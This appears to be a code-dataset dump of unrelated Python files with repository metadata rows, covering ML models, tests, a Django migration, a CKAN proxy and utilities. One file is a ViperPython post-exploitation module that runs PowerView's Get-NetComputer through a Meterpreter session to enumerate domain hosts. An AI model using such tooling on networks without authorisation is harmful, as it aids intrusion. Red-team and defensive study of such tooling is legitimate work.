["Abar_0", "Abar_1", "Abar_2", "A_3"],
["A_0", "Abar_1", "Abar_2", "A_3"],
["Abar_0", "A_1", "Abar_2", "A_3"],
["A_0", "A_1", "Abar_2", "A_3"],
["Abar_0", "Abar_1", "A_2", "A_3"],
["A_0", "Abar_1", "A_2", "A_3"],
["Abar_0", "A_1", "A_2", "A_3"],
["A_0", "A_1", "A_2", "A_3"]]
return combination
| 53.830769 | 101 | 0.446127 |
4a258d49102f09a24351d9370b7f2b54fa566347 | 1,399 | py | Python | src/rest_framework_api_key/migrations/0001_initial.py | LundIT/djangorestframework-api-key | 20f4e539140020d88c872249c87a2704ca29e6e7 | [
"MIT"
] | null | null | null | src/rest_framework_api_key/migrations/0001_initial.py | LundIT/djangorestframework-api-key | 20f4e539140020d88c872249c87a2704ca29e6e7 | [
"MIT"
] | null | null | null | src/rest_framework_api_key/migrations/0001_initial.py | LundIT/djangorestframework-api-key | 20f4e539140020d88c872249c87a2704ca29e6e7 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.14 on 2022-02-15 20:00
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='APIKey',
fields=[
('id', models.CharField(editable=False, max_length=100, primary_key=True, serialize=False, unique=True)),
('prefix', models.CharField(editable=False, max_length=8, unique=True)),
('hashed_key', models.CharField(editable=False, max_length=100)),
('created', models.DateTimeField(auto_now_add=True, db_index=True)),
('name', models.CharField(default=None, help_text='A free-form name for the API key. Need not be unique. 50 characters max.', max_length=50)),
('revoked', models.BooleanField(blank=True, default=False, help_text='If the API key is revoked, clients cannot use it anymore. (This cannot be undone.)')),
('expiry_date', models.DateTimeField(blank=True, help_text='Once API key expires, clients cannot use it anymore.', null=True, verbose_name='Expires')),
],
options={
'verbose_name': 'API key',
'verbose_name_plural': 'API keys',
'ordering': ('-created',),
'abstract': False,
},
),
]
| 42.393939 | 172 | 0.59614 |
4a258d518c0b6e791759d5df813e93f2b66f84ea | 7,222 | py | Python | racklay/model.py | AnuragSahu/RackLay | 8d32eae4642cbaaed57a5b33d1293a1b8d6bff1d | [
"MIT"
] | null | null | null | racklay/model.py | AnuragSahu/RackLay | 8d32eae4642cbaaed57a5b33d1293a1b8d6bff1d | [
"MIT"
] | null | null | null | racklay/model.py | AnuragSahu/RackLay | 8d32eae4642cbaaed57a5b33d1293a1b8d6bff1d | [
"MIT"
] | null | null | null | from collections import OrderedDict
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from .resnet_encoder import ResnetEncoder
# Utils
class ConvBlock(nn.Module):
"""Layer to perform a convolution followed by ELU
"""
def __init__(self, in_channels, out_channels):
super(ConvBlock, self).__init__()
self.conv = Conv3x3(in_channels, out_channels)
self.nonlin = nn.ELU(inplace=True)
def forward(self, x):
out = self.conv(x)
out = self.nonlin(out)
return out
class Conv3x3(nn.Module):
"""Layer to pad and convolve input
"""
def __init__(self, in_channels, out_channels, use_refl=True):
super(Conv3x3, self).__init__()
if use_refl:
self.pad = nn.ReflectionPad2d(1)
else:
self.pad = nn.ZeroPad2d(1)
self.conv = nn.Conv2d(int(in_channels), int(out_channels), 3)
def forward(self, x):
out = self.pad(x)
out = self.conv(out)
return out
def upsample(x):
"""Upsample input tensor by a factor of 2
"""
return F.interpolate(x, scale_factor=2, mode="nearest")
class Encoder(nn.Module):
""" Encodes the Image into low-dimensional feature representation
Attributes
----------
num_layers : int
Number of layers to use in the ResNet
img_ht : int
Height of the input RGB image
img_wt : int
Width of the input RGB image
pretrained : bool
Whether to initialize ResNet with pretrained ImageNet parameters
Methods
-------
forward(x, is_training):
Processes input image tensors into output feature tensors
"""
def __init__(self, num_layers, img_ht, img_wt, pretrained=True):
super(Encoder, self).__init__()
# opt.weights_init == "pretrained"))
self.resnet_encoder = ResnetEncoder(num_layers, pretrained)
num_ch_enc = self.resnet_encoder.num_ch_enc
# convolution to reduce depth and size of features before fc
self.conv1 = Conv3x3(num_ch_enc[-1], 128)
self.conv2 = Conv3x3(128, 256) # Make this 128x128 for old model
self.pool = nn.MaxPool2d(2)
def forward(self, x):
"""
Parameters
----------
x : torch.FloatTensor
Batch of Image tensors
| Shape: (batch_size, 3, img_height, img_width)
Returns
-------
x : torch.FloatTensor
Batch of low-dimensional image representations
| Shape: (batch_size, 128, img_height/128, img_width/128)
"""
batch_size, c, h, w = x.shape
x = self.resnet_encoder(x)[-1]
x = self.pool(self.conv1(x))
x = self.conv2(x)
#x = self.pool(x) # Uncomment for previous model
return x
class Decoder(nn.Module):
""" Encodes the Image into low-dimensional feature representation
Attributes
----------
num_ch_enc : list
channels used by the ResNet Encoder at different layers
Methods
-------
forward(x, ):
Processes input image features into output occupancy maps/layouts
"""
def __init__(self, num_ch_enc, num_out_ch, oct_map_size):
super(Decoder, self).__init__()
self.num_output_channels = num_out_ch
self.num_ch_enc = num_ch_enc
self.num_ch_dec = np.array([8, 16, 32, 64, 128, 256, 512]) # Remove 8 and 512 and change 6 to 4 and 128 to 256 to go back to previous (init) model.
self.oct_map_size = oct_map_size
self.pool = nn.MaxPool2d(2)
# decoder
self.convs = OrderedDict()
for i in range(6, -1, -1):
# upconv_0
num_ch_in = 256 if i == 6 else self.num_ch_dec[i + 1]
num_ch_out = self.num_ch_dec[i]
self.convs[("upconv", i, 0)] = nn.Conv2d(
num_ch_in, num_ch_out, 3, 1, 1)
self.convs[("norm", i, 0)] = nn.BatchNorm2d(num_ch_out)
self.convs[("relu", i, 0)] = nn.ReLU(True)
# upconv_1
self.convs[("upconv", i, 1)] = nn.Conv2d(
num_ch_out, num_ch_out, 3, 1, 1)
self.convs[("norm", i, 1)] = nn.BatchNorm2d(num_ch_out)
self.convs["topview"] = Conv3x3(
self.num_ch_dec[0], self.num_output_channels)
self.dropout = nn.Dropout3d(0.2)
self.decoder = nn.ModuleList(list(self.convs.values()))
def forward(self, x, is_training=True):
"""
Parameters
----------
x : torch.FloatTensor
Batch of encoded feature tensors
| Shape: (batch_size, 128, occ_map_size/2^5, occ_map_size/2^5)
is_training : bool
whether its training or testing phase
Returns
-------
x : torch.FloatTensor
Batch of output Layouts
| Shape: (batch_size, 2, occ_map_size, occ_map_size)
"""
for i in range(6, -1, -1):
#print("SIZE AT THE BEGINNING OF EACH DECODER STEP")
#print(x.shape)
x = self.convs[("upconv", i, 0)](x)
x = self.convs[("norm", i, 0)](x)
x = self.convs[("relu", i, 0)](x)
x = upsample(x)
x = self.convs[("upconv", i, 1)](x)
x = self.convs[("norm", i, 1)](x)
scale_left = self.oct_map_size//x.shape[3] # Making the decoder output size whatever we want (self.opt.occ_map_size)
for i in range(scale_left//2):
x = upsample(x)
x = self.pool(x)
if is_training:
x = self.convs["topview"](x)
else:
softmax = nn.Softmax2d()
x = softmax(self.convs["topview"](x))
return x
class Discriminator(nn.Module):
"""
A patch discriminator used to regularize the decoder
in order to produce layouts close to the true data distribution
"""
def __init__(self):
super(Discriminator, self).__init__()
self.main = nn.Sequential(
# input is (nc) x 64 x 64
nn.Conv2d(1, 8, 3, 2, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. (ndf) x 32 x 32
nn.Conv2d(8, 16, 3, 2, 1, 1, bias=False),
nn.BatchNorm2d(16),
nn.LeakyReLU(0.2, inplace=True),
# state size. (ndf*2) x 16 x 16
nn.Conv2d(16, 32, 3, 2, 1, 1, bias=False),
nn.BatchNorm2d(32),
nn.LeakyReLU(0.2, inplace=True),
# state size. (ndf*4) x 8 x 8
nn.Conv2d(32, 8, 3, 2, 1, 1, bias=False),
nn.BatchNorm2d(8),
nn.LeakyReLU(0.2, inplace=True),
# state size. (ndf*8) x 4 x 4
nn.Conv2d(8, 1, 3, 1, 1, bias=False),
nn.Sigmoid()
)
def forward(self, x):
"""
Parameters
----------
x : torch.FloatTensor
Batch of output Layouts
| Shape: (batch_size, 2, occ_map_size, occ_map_size)
Returns
-------
x : torch.FloatTensor
Patch output of the Discriminator
| Shape: (batch_size, 1, occ_map_size/16, occ_map_size/16)
"""
return self.main(x)
| 30.217573 | 155 | 0.562033 |
4a258d7486777bf0a079bd9763fe361fa766b0bb | 8,841 | py | Python | d7a/alp/test/command_factory.py | L-I-Am/pyd7a | 7e3dd6ff71c92df72570d6b852ca74cc5af50707 | [
"Apache-2.0"
] | 9 | 2016-05-12T20:11:30.000Z | 2020-08-18T05:46:15.000Z | d7a/alp/test/command_factory.py | L-I-Am/pyd7a | 7e3dd6ff71c92df72570d6b852ca74cc5af50707 | [
"Apache-2.0"
] | 2 | 2018-01-14T12:39:06.000Z | 2019-11-25T09:11:08.000Z | d7a/alp/test/command_factory.py | L-I-Am/pyd7a | 7e3dd6ff71c92df72570d6b852ca74cc5af50707 | [
"Apache-2.0"
] | 7 | 2016-09-06T11:08:15.000Z | 2020-10-27T10:29:24.000Z | #
# Copyright (c) 2015-2021 University of Antwerp, Aloxy NV.
#
# This file is part of pyd7a.
# See https://github.com/Sub-IoT/pyd7a for further info.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import binascii
from d7a.alp.command import Command
from d7a.alp.interface import InterfaceType
from d7a.alp.operands.file import DataRequest, Data, FileIdOperand
from d7a.alp.operands.file_header import FileHeaderOperand
from d7a.alp.operands.offset import Offset
from d7a.alp.operands.interface_configuration import InterfaceConfiguration
from d7a.alp.operations.file_management import CreateNewFile
from d7a.alp.operations.forward import Forward
from d7a.alp.operations.requests import ReadFileData, ReadFileHeader
from d7a.alp.operations.responses import ReturnFileData
from d7a.alp.operations.write_operations import WriteFileData, WriteFileHeader
from d7a.alp.regular_action import RegularAction
from d7a.fs.file_header import FileHeader
from d7a.fs.file_permissions import FilePermissions
from d7a.fs.file_properties import FileProperties, ActionCondition, StorageClass
from d7a.sp.configuration import Configuration
class TestCommandFactory(unittest.TestCase):
def test_create_with_read_file_action(self):
c = Command.create_with_read_file_action(file_id=1, length=10)
self.assertEqual(len(c.actions), 1)
self.assertEqual(type(c.actions[0]), RegularAction)
self.assertEqual(type(c.actions[0].operation), ReadFileData)
self.assertEqual(type(c.actions[0].operand), DataRequest)
self.assertEqual(c.actions[0].operand.offset.id, 1)
self.assertEqual(c.actions[0].operand.offset.offset.value, 0)
self.assertEqual(c.actions[0].operand.length, 10)
def test_create_with_write_file_action(self):
data = [0, 1, 2, 3, 4, 5]
c = Command.create_with_write_file_action(file_id=1, data=data)
self.assertEqual(len(c.actions), 1)
self.assertEqual(type(c.actions[0]), RegularAction)
self.assertEqual(type(c.actions[0].operation), WriteFileData)
self.assertEqual(type(c.actions[0].operand), Data)
self.assertEqual(c.actions[0].operand.offset.id, 1)
self.assertEqual(c.actions[0].operand.offset.offset.value, 0)
self.assertEqual(c.actions[0].operand.length, 6)
self.assertEqual(c.actions[0].operand.data, data)
def test_create_with_return_file_data_action(self):
data = [ 1 ]
c = Command.create_with_return_file_data_action(file_id=0x40, data=data)
self.assertEqual(len(c.actions), 1)
self.assertEqual(type(c.actions[0]), RegularAction)
self.assertEqual(type(c.actions[0].operation), ReturnFileData)
self.assertEqual(type(c.actions[0].operand), Data)
self.assertEqual(c.actions[0].operand.offset.id, 0x40)
self.assertEqual(c.actions[0].operand.offset.offset.value, 0)
self.assertEqual(c.actions[0].operand.length, 1)
self.assertEqual(c.actions[0].operand.data, data)
def test_create_with_read_file_action_d7asp(self):
c = Command.create_with_read_file_action(file_id=1, length=10, interface_type=InterfaceType.D7ASP)
self.assertEqual(len(c.actions), 2)
self.assertEqual(type(c.actions[0]), RegularAction)
self.assertEqual(type(c.actions[0].operation), Forward)
self.assertEqual(type(c.actions[0].operand), InterfaceConfiguration)
self.assertEqual(c.actions[0].operand.interface_id.value, 0xD7)
self.assertEqual(type(c.actions[0].operand.interface_configuration), Configuration)
# TODO configuration properties
self.assertEqual(type(c.actions[1].operation), ReadFileData)
self.assertEqual(type(c.actions[1].operand), DataRequest)
self.assertEqual(type(c.actions[1]), RegularAction)
self.assertEqual(type(c.actions[1].operation), ReadFileData)
self.assertEqual(type(c.actions[1].operand), DataRequest)
self.assertEqual(c.actions[1].operand.offset.id, 1)
self.assertEqual(c.actions[1].operand.offset.offset.value, 0)
self.assertEqual(c.actions[1].operand.length, 10)
def test_create_with_write_file_action_d7asp(self):
data = [0, 1, 2, 3, 4, 5]
c = Command.create_with_write_file_action(file_id=1, data=data, interface_type=InterfaceType.D7ASP)
self.assertEqual(len(c.actions), 2)
self.assertEqual(type(c.actions[0]), RegularAction)
self.assertEqual(type(c.actions[0].operation), Forward)
self.assertEqual(type(c.actions[0].operand), InterfaceConfiguration)
self.assertEqual(c.actions[0].operand.interface_id.value, 0xD7)
self.assertEqual(type(c.actions[0].operand.interface_configuration), Configuration)
# TODO configuration properties
self.assertEqual(type(c.actions[1].operation), WriteFileData)
self.assertEqual(type(c.actions[1].operand), Data)
self.assertEqual(c.actions[1].operand.offset.id, 1)
self.assertEqual(c.actions[1].operand.offset.offset.value, 0)
self.assertEqual(c.actions[1].operand.length, 6)
self.assertEqual(c.actions[1].operand.data, data)
def test_create_with_return_file_data_action_d7asp(self):
data = [1]
c = Command.create_with_return_file_data_action(file_id=0x40, data=data, interface_type=InterfaceType.D7ASP)
self.assertEqual(len(c.actions), 2)
self.assertEqual(type(c.actions[0]), RegularAction)
self.assertEqual(type(c.actions[0].operation), Forward)
self.assertEqual(type(c.actions[0].operand), InterfaceConfiguration)
self.assertEqual(c.actions[0].operand.interface_id.value, 0xD7)
self.assertEqual(type(c.actions[0].operand.interface_configuration), Configuration)
self.assertEqual(type(c.actions[1]), RegularAction)
self.assertEqual(type(c.actions[1].operation), ReturnFileData)
self.assertEqual(type(c.actions[1].operand), Data)
self.assertEqual(c.actions[1].operand.offset.id, 0x40)
self.assertEqual(c.actions[1].operand.offset.offset.value, 0)
self.assertEqual(c.actions[1].operand.length, 1)
self.assertEqual(c.actions[1].operand.data, data)
def test_create_with_read_file_header(self):
c = Command.create_with_read_file_header(file_id=0x40)
self.assertEqual(len(c.actions), 1)
self.assertEqual(type(c.actions[0]), RegularAction)
self.assertEqual(type(c.actions[0].operation), ReadFileHeader)
self.assertEqual(type(c.actions[0].operand), FileIdOperand)
self.assertEqual(c.actions[0].operand.file_id, 0x40)
def test_create_with_write_file_header(self):
file_header = FileHeader(
permissions=FilePermissions(
executable=True,
encrypted=False,
user_readable=True,
user_writable=True,
user_executable=False,
guest_readable=True,
guest_executable=False,
guest_writable=False
),
properties=FileProperties(act_enabled=False, act_condition=ActionCondition.WRITE, storage_class=StorageClass.PERMANENT),
alp_command_file_id=0x41,
interface_file_id=0x42,
file_size=1,
allocated_size=1
)
c = Command.create_with_write_file_header(file_id=0x40, file_header=file_header)
self.assertEqual(len(c.actions), 1)
self.assertEqual(type(c.actions[0]), RegularAction)
self.assertEqual(type(c.actions[0].operation), WriteFileHeader)
self.assertEqual(type(c.actions[0].operand), FileHeaderOperand)
self.assertEqual(c.actions[0].operand.file_id, 0x40)
self.assertEqual(c.actions[0].operand.file_header, file_header)
def test_create_with_create_file(self):
file_header = FileHeader(
permissions=FilePermissions(
executable=True,
encrypted=False,
user_readable=True,
user_writable=True,
user_executable=False,
guest_readable=True,
guest_executable=False,
guest_writable=False
),
properties=FileProperties(act_enabled=False, act_condition=ActionCondition.WRITE, storage_class=StorageClass.PERMANENT),
alp_command_file_id=0x41,
interface_file_id=0x42,
file_size=1,
allocated_size=1
)
c = Command.create_with_create_new_file(file_id=0x40, file_header=file_header)
self.assertEqual(len(c.actions), 1)
self.assertEqual(type(c.actions[0]), RegularAction)
self.assertEqual(type(c.actions[0].operation), CreateNewFile)
self.assertEqual(type(c.actions[0].operand), FileHeaderOperand)
self.assertEqual(c.actions[0].operand.file_id, 0x40)
self.assertEqual(c.actions[0].operand.file_header, file_header) | 46.777778 | 126 | 0.754213 |
4a258d75fc92752f9834c8a470c11eacaea2800a | 339 | py | Python | backend/dating/admin.py | crowdbotics-apps/friendmates-31875 | 5018d878c2fd7b07f9fff24b02a704b4838b3e15 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/dating/admin.py | crowdbotics-apps/friendmates-31875 | 5018d878c2fd7b07f9fff24b02a704b4838b3e15 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/dating/admin.py | crowdbotics-apps/friendmates-31875 | 5018d878c2fd7b07f9fff24b02a704b4838b3e15 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | from django.contrib import admin
from .models import Setting, Profile, Inbox, Dislike, Match, UserPhoto, Like
admin.site.register(UserPhoto)
admin.site.register(Setting)
admin.site.register(Profile)
admin.site.register(Like)
admin.site.register(Dislike)
admin.site.register(Match)
admin.site.register(Inbox)
# Register your models here.
| 26.076923 | 76 | 0.80531 |
4a258e0d7f95c3b2d9cb0b4b45edfbf0e68eb0f6 | 1,050 | py | Python | code_week12_713_719/interleaving_string_hard.py | dylanlee101/leetcode | b059afdadb83d504e62afd1227107de0b59557af | [
"Apache-2.0"
] | null | null | null | code_week12_713_719/interleaving_string_hard.py | dylanlee101/leetcode | b059afdadb83d504e62afd1227107de0b59557af | [
"Apache-2.0"
] | null | null | null | code_week12_713_719/interleaving_string_hard.py | dylanlee101/leetcode | b059afdadb83d504e62afd1227107de0b59557af | [
"Apache-2.0"
] | null | null | null | '''
给定三个字符串 s1, s2, s3, 验证 s3 是否是由 s1 和 s2 交错组成的。
示例 1:
输入: s1 = "aabcc", s2 = "dbbca", s3 = "aadbbcbcac"
输出: true
示例 2:
输入: s1 = "aabcc", s2 = "dbbca", s3 = "aadbbbaccc"
输出: false
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/interleaving-string
'''
class Solution:
def isInterleave(self, s1: str, s2: str, s3: str) -> bool:
m, n = len(s1), len(s2)
if m + n != len(s3):
return False
# 初始化dp 包括第一行和第一列
dp = [[False] * (n + 1) for _ in range(m + 1)]
dp[0][0] = True
for i in range(1, m + 1): # 初始化第一列
dp[i][0] = dp[i - 1][0] and (s3[i - 1] == s1[i - 1])
for i in range(1, n + 1): # 初始化第一行
dp[0][i] = dp[0][i - 1] and (s3[i - 1] == s2[i - 1])
# 计算所有dp值
for i in range(1, m + 1):
for j in range(1, n + 1):
# 状态方程
dp[i][j] = (dp[i - 1][j] and (s3[i + j - 1] == s1[i - 1])) or (
dp[i][j - 1] and (s3[i + j - 1] == s2[j - 1]))
return dp[-1][-1]
| 25 | 79 | 0.438095 |
4a2590d175faa793b0e6418ec12b11fd4414dc3b | 1,379 | py | Python | examples/FreeCAD/Ex019_Counter_Sunk_Holes.py | justbuchanan/cadquery | 7ac64a7280490d99d26f4f12a1ff590370d7e8ba | [
"Apache-2.0"
] | null | null | null | examples/FreeCAD/Ex019_Counter_Sunk_Holes.py | justbuchanan/cadquery | 7ac64a7280490d99d26f4f12a1ff590370d7e8ba | [
"Apache-2.0"
] | null | null | null | examples/FreeCAD/Ex019_Counter_Sunk_Holes.py | justbuchanan/cadquery | 7ac64a7280490d99d26f4f12a1ff590370d7e8ba | [
"Apache-2.0"
] | null | null | null | #File: Ex019_Counter_Sunk_Holes.py
#To use this example file, you need to first follow the "Using CadQuery From Inside FreeCAD"
#instructions here: https://github.com/dcowden/cadquery#installing----using-cadquery-from-inside-freecad
#You run this example by typing the following in the FreeCAD python console, making sure to change
#the path to this example, and the name of the example appropriately.
#import sys
#sys.path.append('/home/user/Downloads/cadquery/examples/FreeCAD')
#import Ex019_Counter_Sunk_Holes
#If you need to reload the part after making a change, you can use the following lines within the FreeCAD console.
#reload(Ex019_Counter_Sunk_Holes)
#You'll need to delete the original shape that was created, and the new shape should be named sequentially
# (Shape001, etc).
#You can also tie these blocks of code to macros, buttons, and keybindings in FreeCAD for quicker access.
#You can get a more information on this example at
# http://parametricparts.com/docs/examples.html#an-extruded-prismatic-solid
import cadquery
import Part
#Create a plate with 4 counter-sunk holes in it
result = cadquery.Workplane(cadquery.Plane.XY()).box(4, 2, 0.5).faces(">Z").workplane() \
.rect(3.5, 1.5, forConstruction=True)\
.vertices().cskHole(0.125, 0.25, 82.0, depth=None)
#Boiler plate code to render our solid in FreeCAD's GUI
Part.show(result.toFreecad())
| 44.483871 | 114 | 0.774474 |
4a2591ebe14d89c02f28805a27a66e8d727400cd | 1,625 | py | Python | biobb_adapters/pycompss/biobb_chemistry/acpype/acpype_params_gmx.py | bioexcel/biobb_adapters | 45f32feac328cb05f28038b2b00a7416fcae3178 | [
"Apache-2.0"
] | null | null | null | biobb_adapters/pycompss/biobb_chemistry/acpype/acpype_params_gmx.py | bioexcel/biobb_adapters | 45f32feac328cb05f28038b2b00a7416fcae3178 | [
"Apache-2.0"
] | 4 | 2019-03-04T15:22:06.000Z | 2021-09-24T14:43:48.000Z | biobb_adapters/pycompss/biobb_chemistry/acpype/acpype_params_gmx.py | bioexcel/biobb_adapters | 45f32feac328cb05f28038b2b00a7416fcae3178 | [
"Apache-2.0"
] | 2 | 2020-09-08T05:26:23.000Z | 2022-03-28T07:09:20.000Z | # Python
import os
import sys
import traceback
# Pycompss
from pycompss.api.task import task
from pycompss.api.parameter import FILE_IN, FILE_OUT
# Adapters commons pycompss
from biobb_adapters.pycompss.biobb_commons import task_config
# Wrapped Biobb
from biobb_chemistry.acpype.acpype_params_gmx import AcpypeParamsGMX # Importing class instead of module to avoid name collision
task_time_out = int(os.environ.get('TASK_TIME_OUT', 0))
@task(input_path=FILE_IN, output_path_gro=FILE_OUT, output_path_itp=FILE_OUT, output_path_top=FILE_OUT,
on_failure="IGNORE", time_out=task_time_out)
def _acpypeparamsgmx(input_path, output_path_gro, output_path_itp, output_path_top, properties, **kwargs):
task_config.pop_pmi(os.environ)
try:
AcpypeParamsGMX(input_path=input_path, output_path_gro=output_path_gro, output_path_itp=output_path_itp, output_path_top=output_path_top, properties=properties, **kwargs).launch()
except Exception as e:
traceback.print_exc()
raise e
finally:
sys.stdout.flush()
sys.stderr.flush()
def acpype_params_gmx(input_path, output_path_gro, output_path_itp, output_path_top, properties=None, **kwargs):
if (output_path_gro is None or os.path.exists(output_path_gro)) and \
(output_path_itp is None or os.path.exists(output_path_itp)) and \
(output_path_top is None or os.path.exists(output_path_top)) and \
True:
print("WARN: Task AcpypeParamsGMX already executed.")
else:
_acpypeparamsgmx( input_path, output_path_gro, output_path_itp, output_path_top, properties, **kwargs) | 40.625 | 187 | 0.763077 |
4a259257865ba557a5e89dc34ab9c7f4f6fff407 | 3,330 | py | Python | ckanext/geoview/controllers/service_proxy.py | davidread/ckanext-geoview | ceefb65c89cd7449a84659ee8678ae122d68cd02 | [
"MIT"
] | 1 | 2018-05-03T14:03:40.000Z | 2018-05-03T14:03:40.000Z | ckanext/geoview/controllers/service_proxy.py | davidread/ckanext-geoview | ceefb65c89cd7449a84659ee8678ae122d68cd02 | [
"MIT"
] | null | null | null | ckanext/geoview/controllers/service_proxy.py | davidread/ckanext-geoview | ceefb65c89cd7449a84659ee8678ae122d68cd02 | [
"MIT"
] | null | null | null | from logging import getLogger
import urlparse
import requests
import ckan.logic as logic
import ckan.lib.base as base
log = getLogger(__name__)
MAX_FILE_SIZE = 3 * 1024 * 1024 # 1MB
CHUNK_SIZE = 512
def proxy_service(self, context, data_dict):
''' Chunked proxy for resources. To make sure that the file is not too
large, first, we try to get the content length from the headers.
If the headers to not contain a content length (if it is a chinked
response), we only transfer as long as the transferred data is less
than the maximum file size. '''
resource_id = data_dict['resource_id']
log.info('Proxify resource {id}'.format(id=resource_id))
resource = logic.get_action('resource_show')(context, {'id': resource_id})
url = resource['url']
parts = urlparse.urlsplit(url)
if not parts.scheme or not parts.netloc:
base.abort(409, detail='Invalid URL.')
try:
req = self._py_object.request
method = req.environ["REQUEST_METHOD"]
url = url.split('?')[0] # remove potential query and fragment
if method == "POST":
length = int(req.environ["CONTENT_LENGTH"])
headers = {"Content-Type": req.environ["CONTENT_TYPE"]}
body = req.body
r = requests.post(url, data=body, headers=headers, stream=True)
else:
r = requests.get(url, params=req.query_string, stream=True)
#log.info('Request: {req}'.format(req=r.request.url))
#log.info('Request Headers: {h}'.format(h=r.request.headers))
cl = r.headers['content-length']
if cl and int(cl) > MAX_FILE_SIZE:
base.abort(409, ('''Content is too large to be proxied. Allowed
file size: {allowed}, Content-Length: {actual}. Url: '''+url).format(
allowed=MAX_FILE_SIZE, actual=cl))
base.response.content_type = r.headers['content-type']
base.response.charset = r.encoding
length = 0
for chunk in r.iter_content(chunk_size=CHUNK_SIZE):
base.response.body_file.write(chunk)
length += len(chunk)
if length >= MAX_FILE_SIZE:
base.abort(409, ('''Content is too large to be proxied. Allowed
file size: {allowed}, Content-Length: {actual}. Url: '''+url).format(
allowed=MAX_FILE_SIZE, actual=length))
except requests.exceptions.HTTPError, error:
details = 'Could not proxy resource. Server responded with %s %s' % (
error.response.status_code, error.response.reason)
base.abort(409, detail=details)
except requests.exceptions.ConnectionError, error:
details = '''Could not proxy resource because a
connection error occurred. %s''' % error
base.abort(502, detail=details)
except requests.exceptions.Timeout, error:
details = 'Could not proxy resource because the connection timed out.'
base.abort(504, detail=details)
class ServiceProxyController(base.BaseController):
def proxy_service(self, resource_id):
data_dict = {'resource_id': resource_id}
context = {'model': base.model, 'session': base.model.Session,
'user': base.c.user or base.c.author}
return proxy_service(self, context, data_dict)
| 39.642857 | 85 | 0.63964 |
4a2592a8c730e8afdb0936dee405f06d5b948c4a | 2,265 | py | Python | MODULES/Discovery_RemoteSystemDiscovery_GetNetComputer.py | FunnyWolf/viperpython | ba794ee74079285be32191e898daa3e56305c8be | [
"BSD-3-Clause"
] | 42 | 2021-01-20T15:30:33.000Z | 2022-03-31T07:51:11.000Z | MODULES/Discovery_RemoteSystemDiscovery_GetNetComputer.py | FunnyWolf/viperpython | ba794ee74079285be32191e898daa3e56305c8be | [
"BSD-3-Clause"
] | 2 | 2021-08-17T00:16:33.000Z | 2022-02-21T11:37:45.000Z | MODULES/Discovery_RemoteSystemDiscovery_GetNetComputer.py | FunnyWolf/viperpython | ba794ee74079285be32191e898daa3e56305c8be | [
"BSD-3-Clause"
] | 28 | 2021-01-22T05:06:39.000Z | 2022-03-31T03:27:42.000Z | # -*- coding: utf-8 -*-
# @File : SimplePostPowershellModule.py
# @Date : 2019/1/12
# @Desc :
from Lib.ModuleAPI import *
class PostModule(PostMSFPowershellFunctionModule):
NAME_ZH = "获取域内主机名"
DESC_ZH = "模块获取主机所在域的所有域主机名,如果主机不在域中,脚本可能报错."
NAME_EN = "Get the hostname in the domain"
DESC_EN = "The module obtains all domain host names of the domain where the host is located.\n" \
"If the host is not in the domain, the script may report an error."
MODULETYPE = TAG2TYPE.Discovery
PLATFORM = ["Windows"] # 平台
PERMISSIONS = ["Administrator", "SYSTEM", ] # 所需权限
ATTCK = ["T1018"] # ATTCK向量
README = ["https://www.yuque.com/vipersec/module/ivaxm9"]
REFERENCES = ["https://attack.mitre.org/techniques/T1018/"]
AUTHOR = "Viper"
def __init__(self, sessionid, ipaddress, custom_param):
super().__init__(sessionid, ipaddress, custom_param)
self.set_script("PowerView.ps1") # 设置目标机执行的脚本文件
self.set_execute_string('Get-NetComputer')
def check(self):
"""执行前的检查函数"""
session = Session(self._sessionid)
if session.is_in_domain:
self.set_execute_string('Get-NetComputer')
return True, None
else:
return False, "此模块只支持Windows的Meterpreter,且session所属用户必须在域中", "This module only supports Meterpreter of Windows, and the user of the session must be in the domain"
def callback(self, status, message, data):
if status:
powershell_json_output = data.split("\n")
if isinstance(powershell_json_output, list) and len(powershell_json_output) > 0:
try:
for one in powershell_json_output:
if one is None or len(one) == 0:
continue
else:
self.log_good(f"主机名: {one}", f"Hostname: {one}")
except Exception as E:
pass
else:
self.log_error("脚本无有效输出", "Script has no valid output")
self.log_error(powershell_json_output, powershell_json_output)
else:
self.log_error("模块执行失败", "Module execution failed")
self.log_error(message, message)
| 38.389831 | 174 | 0.606623 |
4a2592c25d233040e3bbdc883b2ac12fd61a4702 | 10,131 | py | Python | engine/common/common_request_process.py | datapunk2078/torro_community | 97a97c9d089b0a7b47ccdc28e4e077da36d4b85c | [
"MIT"
] | null | null | null | engine/common/common_request_process.py | datapunk2078/torro_community | 97a97c9d089b0a7b47ccdc28e4e077da36d4b85c | [
"MIT"
] | null | null | null | engine/common/common_request_process.py | datapunk2078/torro_community | 97a97c9d089b0a7b47ccdc28e4e077da36d4b85c | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: UTF-8 -*
"""
@author:li-boss
@file_name: common_request_process.py
@create date: 2019-10-27 14:08
@blog https://leezhonglin.github.io
@csdn https://blog.csdn.net/qq_33196814
@file_description:请求处理
"""
import json
from json import JSONDecodeError
from common.common_api_version import apiVersion
from common.common_response_code import response_code
from common.common_response_log import ResponseLog
from common.common_response_process import response_result_process
from utils.log_helper import lg
from utils.xml_json_process import xml_to_json, is_none
from flask import g
class requestProcess(object):
"""
请求处理
"""
def get_user_key(self):
try:
user_key = g.user_key
except:
user_key = 1
return user_key
def get_user_account_id(self,):
try:
user_key = g.user_key
# # print(user_key)
account_id = g.account_id
except:
account_id = 'TorroAdmin'
return account_id
def get_workspace_id(self,):
try:
user_key = g.user_key
# # print(user_key)
workspace_id = g.workspace_id
except:
workspace_id = 362
return workspace_id
def _xml_request(self, request, model_json=None):
"""
处理xml请求参数为json格式
:param data: 请求
:return:
"""
try:
data = request.data
temp = data.decode('utf-8')
if temp == '':
return {}
try:
param_temp = xml_to_json(temp)
